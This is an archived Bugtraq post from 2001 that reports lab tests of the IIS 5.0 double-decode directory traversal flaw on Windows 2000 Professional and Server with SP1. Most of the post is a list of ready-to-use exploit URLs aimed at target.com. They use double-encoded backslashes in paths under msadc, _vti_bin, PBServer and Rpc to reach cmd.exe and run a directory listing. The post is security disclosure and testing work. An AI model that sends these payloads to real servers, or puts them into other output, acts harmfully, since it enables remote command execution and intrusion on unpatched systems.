Home page logo
/

bugtraq logo Bugtraq mailing list archives

Nsfocus advisory testing
From: Aldo Albuquerque - Segurança de Sistemas <aldo () cesar org br>
Date: Wed, 16 May 2001 00:18:05 -0300

Hi,

We tested various settings in our lab, with
different encoding combinations, executable directories,
and Win32 configurations.

Curiously, not all combinations worked quite the same
way on Windows 2000 Server and Professional (even discounting
the fact that certain directories exist in one and not in the
other, like PBServer or Rpc).

- Windows 2000 Professional + SP1 + IIS5.0 - Default installation
* The following combinations of directories/encodings work:

http://www.target.com/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd
.exe?/c+dir+c:\
http://www.target.com/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd
.exe?/c+dir+c:\
http://www.target.com/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system
32/cmd.exe?/c+dir+c:\
http://www.target.com/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/
system32/cmd.exe?/c+dir+c:\
http://www.target.com/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.e
xe?/c+dir+c:\
http://www.target.com/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.e
xe?/c+dir+c:\
http://www.target.com/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system
32/cmd.exe?/c+dir+c:\
http://www.target.com/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winn
t/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/s
ystem32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/s
ystem32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63
../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63.
.%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\


- Windows 2000 Server + SP1 + IIS5.0 - Default installation
* The following combinations of directories/encodings work:


http://www.target.com/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/
c+dir+c:\
http://www.target.com/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/
c+dir+c:\
http://www.target.com/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd
.exe?/c+dir+c:\
http://www.target.com/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system
32/cmd.exe?/c+dir+c:\
http://www.target.com/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
+c:\
http://www.target.com/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
+c:\
http://www.target.com/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?
/c+dir+c:\
http://www.target.com/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cm
d.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/s
ystem32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/s
ystem32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63
../winnt/system32/cmd.exe?/c+dir+c:\
http://www.target.com/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63.
.%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\

It would be interesting if tests were also made by others in NT 4.0 SP6a,
since we did not test combinations with other commonly-installed
directories, such as cgi-bin, adsamples, _vti_cnf,iisadmpwd, etc.

Regards,

Aldo Albuquerque - CCSA
Tempest Security Technologies - http://www.tempest.com.br
CESAR - Centro de Estudos e Sistemas Avançados do Recife -
http://www.cesar.org.br




  By Date           By Thread  

Current thread:
  • Nsfocus advisory testing Aldo Albuquerque - Segurança de Sistemas (May 16)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]